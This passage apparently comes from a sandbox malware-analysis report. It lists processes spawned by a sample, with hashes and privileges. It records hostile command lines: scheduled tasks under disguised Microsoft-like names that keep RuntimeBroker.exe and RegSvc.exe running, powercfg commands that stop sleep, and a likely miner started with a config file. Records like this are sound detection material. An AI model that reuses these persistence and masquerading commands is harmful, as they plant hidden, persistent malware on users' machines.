                                                                                                                  Commandline:"cmd.exe" /C powercfg /x -hibernate-timeout-ac 0 & powercfg /x -hibernate-timeout-dc 0 & powercfg /x -standby-timeout-ac 0 & powercfg /x -standby-timeout-dc 0 & powercfg /hibernate off & SCHTASKS /CREATE /SC MINUTE /MO 5 /TN "ActivationRule" /TR "C:\ProgramData\RuntimeBrokerData\RuntimeBroker.exe" /RL HIGHEST /f
                                                                                                                  Imagebase:0xb0000
                                                                                                                  File size:232960 bytes
                                                                                                                  MD5 hash:F3BDBE3BB6F734E357235F4D5898582D
                                                                                                                  Has elevated privileges:true
                                                                                                                  Has administrator privileges:true
                                                                                                                  Programmed in:C, C++ or other language

                                                                                                                  General

                                                                                                                  Target ID:42
                                                                                                                  Start time:00:17:20
                                                                                                                  Start date:19/03/2023
                                                                                                                  Path:C:\Windows\System32\conhost.exe
                                                                                                                  Wow64 process (32bit):false
                                                                                                                  Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                  Imagebase:0x7ff745070000
                                                                                                                  File size:625664 bytes
                                                                                                                  MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                                                                                                                  Has elevated privileges:true
                                                                                                                  Has administrator privileges:true
                                                                                                                  Programmed in:C, C++ or other language

                                                                                                                  General

                                                                                                                  Target ID:43
                                                                                                                  Start time:00:17:20
                                                                                                                  Start date:19/03/2023
                                                                                                                  Path:C:\Windows\SysWOW64\schtasks.exe
                                                                                                                  Wow64 process (32bit):true
                                                                                                                  Commandline:SCHTASKS /CREATE /SC HOURLY /TN "AntiMalwareSericeExecutable\AntiMalwareSericeExecutableServices_bk64" /TR "C:\ProgramData\RuntimeBrokerData\RuntimeBroker.exe" /RL HIGHEST /f
                                                                                                                  Imagebase:0xff0000
                                                                                                                  File size:185856 bytes
                                                                                                                  MD5 hash:15FF7D8324231381BAD48A052F85DF04
                                                                                                                  Has elevated privileges:true
                                                                                                                  Has administrator privileges:true
                                                                                                                  Programmed in:C, C++ or other language

                                                                                                                  General

                                                                                                                  Target ID:44
                                                                                                                  Start time:00:17:20
                                                                                                                  Start date:19/03/2023
                                                                                                                  Path:C:\Windows\SysWOW64\schtasks.exe
                                                                                                                  Wow64 process (32bit):true
                                                                                                                  Commandline:SCHTASKS /CREATE /SC HOURLY /TN "MicrosoftUpdateServices\MicrosoftUpdateServicesServices_bk620" /TR "C:\ProgramData\RuntimeBrokerData\RuntimeBroker.exe" /RL HIGHEST /f
                                                                                                                  Imagebase:0xff0000
                                                                                                                  File size:185856 bytes
                                                                                                                  MD5 hash:15FF7D8324231381BAD48A052F85DF04
                                                                                                                  Has elevated privileges:true
                                                                                                                  Has administrator privileges:true
                                                                                                                  Programmed in:C, C++ or other language

                                                                                                                  General

                                                                                                                  Target ID:45
                                                                                                                  Start time:00:17:20
                                                                                                                  Start date:19/03/2023
                                                                                                                  Path:C:\Windows\SysWOW64\schtasks.exe
                                                                                                                  Wow64 process (32bit):true
                                                                                                                  Commandline:SCHTASKS /CREATE /SC HOURLY /TN "SettingSysHost\SettingSysHostServices_bk248" /TR "C:\ProgramData\RuntimeBrokerData\RuntimeBroker.exe" /RL HIGHEST /f
                                                                                                                  Imagebase:0xff0000
                                                                                                                  File size:185856 bytes
                                                                                                                  MD5 hash:15FF7D8324231381BAD48A052F85DF04
                                                                                                                  Has elevated privileges:true
                                                                                                                  Has administrator privileges:true
                                                                                                                  Programmed in:C, C++ or other language

                                                                                                                  General

                                                                                                                  Target ID:46
                                                                                                                  Start time:00:17:20
                                                                                                                  Start date:19/03/2023
                                                                                                                  Path:C:\Windows\System32\conhost.exe
                                                                                                                  Wow64 process (32bit):false
                                                                                                                  Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                  Imagebase:0x7ff745070000
                                                                                                                  File size:625664 bytes
                                                                                                                  MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                                                                                                                  Has elevated privileges:true
                                                                                                                  Has administrator privileges:true
                                                                                                                  Programmed in:C, C++ or other language

                                                                                                                  General

                                                                                                                  Target ID:47
                                                                                                                  Start time:00:17:20
                                                                                                                  Start date:19/03/2023
                                                                                                                  Path:C:\Windows\SysWOW64\cmd.exe
                                                                                                                  Wow64 process (32bit):true
                                                                                                                  Commandline:"cmd.exe" /C SCHTASKS /CREATE /SC MINUTE /MO 5 /TN "ActivationRuntime" /TR "C:\ProgramData\RuntimeBrokerData\RegSvc.exe" /f
                                                                                                                  Imagebase:0xb0000
                                                                                                                  File size:232960 bytes
                                                                                                                  MD5 hash:F3BDBE3BB6F734E357235F4D5898582D
                                                                                                                  Has elevated privileges:true
                                                                                                                  Has administrator privileges:true
                                                                                                                  Programmed in:C, C++ or other language

                                                                                                                  General

                                                                                                                  Target ID:48
                                                                                                                  Start time:00:17:20
                                                                                                                  Start date:19/03/2023
                                                                                                                  Path:C:\Windows\SysWOW64\schtasks.exe
                                                                                                                  Wow64 process (32bit):true
                                                                                                                  Commandline:SCHTASKS /CREATE /SC HOURLY /TN "Agent Activation Runtime\Agent Activation RuntimeServices_bk903" /TR "C:\ProgramData\RuntimeBrokerData\RuntimeBroker.exe" /RL HIGHEST /f
                                                                                                                  Imagebase:0xff0000
                                                                                                                  File size:185856 bytes
                                                                                                                  MD5 hash:15FF7D8324231381BAD48A052F85DF04
                                                                                                                  Has elevated privileges:true
                                                                                                                  Has administrator privileges:true
                                                                                                                  Programmed in:C, C++ or other language

                                                                                                                  General

                                                                                                                  Target ID:49
                                                                                                                  Start time:00:17:20
                                                                                                                  Start date:19/03/2023
                                                                                                                  Path:C:\Windows\System32\conhost.exe
                                                                                                                  Wow64 process (32bit):false
                                                                                                                  Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                  Imagebase:0x7ff745070000
                                                                                                                  File size:625664 bytes
                                                                                                                  MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                                                                                                                  Has elevated privileges:true
                                                                                                                  Has administrator privileges:true
                                                                                                                  Programmed in:C, C++ or other language

                                                                                                                  General

                                                                                                                  Target ID:50
                                                                                                                  Start time:00:17:21
                                                                                                                  Start date:19/03/2023
                                                                                                                  Path:C:\Windows\SysWOW64\powercfg.exe
                                                                                                                  Wow64 process (32bit):true
                                                                                                                  Commandline:powercfg /x -hibernate-timeout-ac 0
                                                                                                                  Imagebase:0x100000
                                                                                                                  File size:80896 bytes
                                                                                                                  MD5 hash:FA313DB034098C26069DBADD6178DEB3
                                                                                                                  Has elevated privileges:true
                                                                                                                  Has administrator privileges:true
                                                                                                                  Programmed in:C, C++ or other language

                                                                                                                  General

                                                                                                                  Target ID:51
                                                                                                                  Start time:00:17:21
                                                                                                                  Start date:19/03/2023
                                                                                                                  Path:C:\Windows\SysWOW64\schtasks.exe
                                                                                                                  Wow64 process (32bit):true
                                                                                                                  Commandline:SCHTASKS /CREATE /SC MINUTE /MO 5 /TN "ActivationRuntime" /TR "C:\ProgramData\RuntimeBrokerData\RegSvc.exe" /f
                                                                                                                  Imagebase:0xff0000
                                                                                                                  File size:185856 bytes
                                                                                                                  MD5 hash:15FF7D8324231381BAD48A052F85DF04
                                                                                                                  Has elevated privileges:true
                                                                                                                  Has administrator privileges:true
                                                                                                                  Programmed in:C, C++ or other language

                                                                                                                  General

                                                                                                                  Target ID:52
                                                                                                                  Start time:00:17:21
                                                                                                                  Start date:19/03/2023
                                                                                                                  Path:C:\Windows\SysWOW64\powercfg.exe
                                                                                                                  Wow64 process (32bit):true
                                                                                                                  Commandline:powercfg /x -hibernate-timeout-dc 0
                                                                                                                  Imagebase:0x100000
                                                                                                                  File size:80896 bytes
                                                                                                                  MD5 hash:FA313DB034098C26069DBADD6178DEB3
                                                                                                                  Has elevated privileges:true
                                                                                                                  Has administrator privileges:true
                                                                                                                  Programmed in:C, C++ or other language

                                                                                                                  General

                                                                                                                  Target ID:53
                                                                                                                  Start time:00:17:21
                                                                                                                  Start date:19/03/2023
                                                                                                                  Path:C:\Windows\SysWOW64\powercfg.exe
                                                                                                                  Wow64 process (32bit):true
                                                                                                                  Commandline:powercfg /x -standby-timeout-ac 0
                                                                                                                  Imagebase:0x100000
                                                                                                                  File size:80896 bytes
                                                                                                                  MD5 hash:FA313DB034098C26069DBADD6178DEB3
                                                                                                                  Has elevated privileges:true
                                                                                                                  Has administrator privileges:true
                                                                                                                  Programmed in:C, C++ or other language

                                                                                                                  General

                                                                                                                  Target ID:54
                                                                                                                  Start time:00:17:22
                                                                                                                  Start date:19/03/2023
                                                                                                                  Path:C:\Windows\System32\svchost.exe
                                                                                                                  Wow64 process (32bit):false
                                                                                                                  Commandline:c:\windows\system32\svchost.exe -k localservice -p -s CDPSvc
                                                                                                                  Imagebase:0x7ff651c80000
                                                                                                                  File size:51288 bytes
                                                                                                                  MD5 hash:32569E403279B3FD2EDB7EBD036273FA
                                                                                                                  Has elevated privileges:true
                                                                                                                  Has administrator privileges:false
                                                                                                                  Programmed in:C, C++ or other language

                                                                                                                  General

                                                                                                                  Target ID:55
                                                                                                                  Start time:00:17:22
                                                                                                                  Start date:19/03/2023
                                                                                                                  Path:C:\Windows\SysWOW64\powercfg.exe
                                                                                                                  Wow64 process (32bit):true
                                                                                                                  Commandline:powercfg /x -standby-timeout-dc 0
                                                                                                                  Imagebase:0x100000
                                                                                                                  File size:80896 bytes
                                                                                                                  MD5 hash:FA313DB034098C26069DBADD6178DEB3
                                                                                                                  Has elevated privileges:true
                                                                                                                  Has administrator privileges:true
                                                                                                                  Programmed in:C, C++ or other language

                                                                                                                  General

                                                                                                                  Target ID:56
                                                                                                                  Start time:00:17:22
                                                                                                                  Start date:19/03/2023
                                                                                                                  Path:C:\ProgramData\RuntimeBrokerData\RegSvc.exe
                                                                                                                  Wow64 process (32bit):true
                                                                                                                  Commandline:C:\ProgramData\RuntimeBrokerData\RegSvc.exe
                                                                                                                  Imagebase:0x1b0000
                                                                                                                  File size:88064 bytes
                                                                                                                  MD5 hash:BFD02E7E401667B6C5853FE0FBEC26E7
                                                                                                                  Has elevated privileges:false
                                                                                                                  Has administrator privileges:false
                                                                                                                  Programmed in:.Net C# or VB.NET
                                                                                                                  Antivirus matches:
                                                                                                                  • Detection: 100%, Joe Sandbox ML

                                                                                                                  General

                                                                                                                  Target ID:57
                                                                                                                  Start time:00:17:22
                                                                                                                  Start date:19/03/2023
                                                                                                                  Path:C:\Windows\SysWOW64\powercfg.exe
                                                                                                                  Wow64 process (32bit):true
                                                                                                                  Commandline:powercfg /hibernate off
                                                                                                                  Imagebase:0x100000
                                                                                                                  File size:80896 bytes
                                                                                                                  MD5 hash:FA313DB034098C26069DBADD6178DEB3
                                                                                                                  Has elevated privileges:true
                                                                                                                  Has administrator privileges:true
                                                                                                                  Programmed in:C, C++ or other language

                                                                                                                  General

                                                                                                                  Target ID:59
                                                                                                                  Start time:00:17:23
                                                                                                                  Start date:19/03/2023
                                                                                                                  Path:C:\Windows\SysWOW64\schtasks.exe
                                                                                                                  Wow64 process (32bit):true
                                                                                                                  Commandline:SCHTASKS /CREATE /SC MINUTE /MO 5 /TN "ActivationRule" /TR "C:\ProgramData\RuntimeBrokerData\RuntimeBroker.exe" /RL HIGHEST /f
                                                                                                                  Imagebase:0xff0000
                                                                                                                  File size:185856 bytes
                                                                                                                  MD5 hash:15FF7D8324231381BAD48A052F85DF04
                                                                                                                  Has elevated privileges:true
                                                                                                                  Has administrator privileges:true
                                                                                                                  Programmed in:C, C++ or other language

                                                                                                                  General

                                                                                                                  Target ID:61
                                                                                                                  Start time:00:17:23
                                                                                                                  Start date:19/03/2023
                                                                                                                  Path:C:\Windows\System32\svchost.exe
                                                                                                                  Wow64 process (32bit):false
                                                                                                                  Commandline:c:\windows\system32\svchost.exe -k networkservice -p -s DoSvc
                                                                                                                  Imagebase:0x7ff651c80000
                                                                                                                  File size:51288 bytes
                                                                                                                  MD5 hash:32569E403279B3FD2EDB7EBD036273FA
                                                                                                                  Has elevated privileges:true
                                                                                                                  Has administrator privileges:false
                                                                                                                  Programmed in:C, C++ or other language

                                                                                                                  General

                                                                                                                  Target ID:67
                                                                                                                  Start time:00:17:24
                                                                                                                  Start date:19/03/2023
                                                                                                                  Path:C:\Windows\System32\svchost.exe
                                                                                                                  Wow64 process (32bit):false
                                                                                                                  Commandline:C:\Windows\System32\svchost.exe -k NetworkService -p
                                                                                                                  Imagebase:0x7ff651c80000
                                                                                                                  File size:51288 bytes
                                                                                                                  MD5 hash:32569E403279B3FD2EDB7EBD036273FA
                                                                                                                  Has elevated privileges:true
                                                                                                                  Has administrator privileges:false
                                                                                                                  Programmed in:C, C++ or other language

                                                                                                                  General

                                                                                                                  Target ID:68
                                                                                                                  Start time:00:17:25
                                                                                                                  Start date:19/03/2023
                                                                                                                  Path:C:\Windows\System32\SgrmBroker.exe
                                                                                                                  Wow64 process (32bit):false
                                                                                                                  Commandline:C:\Windows\system32\SgrmBroker.exe
                                                                                                                  Imagebase:0x7ff651c80000
                                                                                                                  File size:163336 bytes
                                                                                                                  MD5 hash:D3170A3F3A9626597EEE1888686E3EA6
                                                                                                                  Has elevated privileges:true
                                                                                                                  Has administrator privileges:true
                                                                                                                  Programmed in:C, C++ or other language

                                                                                                                  General

                                                                                                                  Target ID:70
                                                                                                                  Start time:00:17:26
                                                                                                                  Start date:19/03/2023
                                                                                                                  Path:C:\Windows\System32\svchost.exe
                                                                                                                  Wow64 process (32bit):false
                                                                                                                  Commandline:c:\windows\system32\svchost.exe -k netsvcs -p
                                                                                                                  Imagebase:0x7ff651c80000
                                                                                                                  File size:51288 bytes
                                                                                                                  MD5 hash:32569E403279B3FD2EDB7EBD036273FA
                                                                                                                  Has elevated privileges:true
                                                                                                                  Has administrator privileges:true
                                                                                                                  Programmed in:C, C++ or other language

                                                                                                                  General

                                                                                                                  Target ID:71
                                                                                                                  Start time:00:17:28
                                                                                                                  Start date:19/03/2023
                                                                                                                  Path:C:\Windows\System32\svchost.exe
                                                                                                                  Wow64 process (32bit):false
                                                                                                                  Commandline:c:\windows\system32\svchost.exe -k localservicenetworkrestricted -p -s wscsvc
                                                                                                                  Imagebase:0x7ff651c80000
                                                                                                                  File size:51288 bytes
                                                                                                                  MD5 hash:32569E403279B3FD2EDB7EBD036273FA
                                                                                                                  Has elevated privileges:true
                                                                                                                  Has administrator privileges:false
                                                                                                                  Programmed in:C, C++ or other language

                                                                                                                  General

                                                                                                                  Target ID:72
                                                                                                                  Start time:00:17:59
                                                                                                                  Start date:19/03/2023
                                                                                                                  Path:C:\Windows\SysWOW64\cmd.exe
                                                                                                                  Wow64 process (32bit):true
                                                                                                                  Commandline:"cmd.exe" /c chcp 1251 & C:\ProgramData\RuntimeBrokerData\svhost.exe -c config.json
                                                                                                                  Imagebase:0xb0000
                                                                                                                  File size:232960 bytes
                                                                                                                  MD5 hash:F3BDBE3BB6F734E357235F4D5898582D
                                                                                                                  Has elevated privileges:true
                                                                                                                  Has administrator privileges:true
                                                                                                                  Programmed in:C, C++ or other language

                                                                                                                  General

                                                                                                                  Target ID:73
                                                                                                                  Start time:00:18:01
                                                                                                                  Start date:19/03/2023
                                                                                                                  Path:C:\Windows\System32\conhost.exe
                                                                                                                  Wow64 process (32bit):false
                                                                                                                  Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                  Imagebase:0x7ff745070000
                                                                                                                  File size:625664 bytes
                                                                                                                  MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                                                                                                                  Has elevated privileges:true
                                                                                                                  Has administrator privileges:true
                                                                                                                  Programmed in:C, C++ or other language

                                                                                                                  General

                                                                                                                  Target ID:74
                                                                                                                  Start time:00:18:01
                                                                                                                  Start date:19/03/2023
                                                                                                                  Path:C:\Windows\SysWOW64\chcp.com
                                                                                                                  Wow64 process (32bit):true
                                                                                                                  Commandline:chcp 1251
                                                                                                                  Imagebase:0x100000
                                                                                                                  File size:12800 bytes
                                                                                                                  MD5 hash:561054CF9C4B2897E80D7E7D9027FED9
                                                                                                                  Has elevated privileges:true
                                                                                                                  Has administrator privileges:true
                                                                                                                  Programmed in:C, C++ or other language

                                                                                                                  General

                                                                                                                  Target ID:80
                                                                                                                  Start time:00:18:14
                                                                                                                  Start date:19/03/2023
                                                                                                                  Path:C:\Windows\System32\Conhost.exe
                                                                                                                  Wow64 process (32bit):
                                                                                                                  Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                  Imagebase:
                                                                                                                  File size:625664 bytes
                                                                                                                  MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                                                                                                                  Has elevated privileges:
                                                                                                                  Has administrator privileges:
                                                                                                                  Programmed in:C, C++ or other language

                                                                                                                  Disassembly

                                                                                                                  No disassembly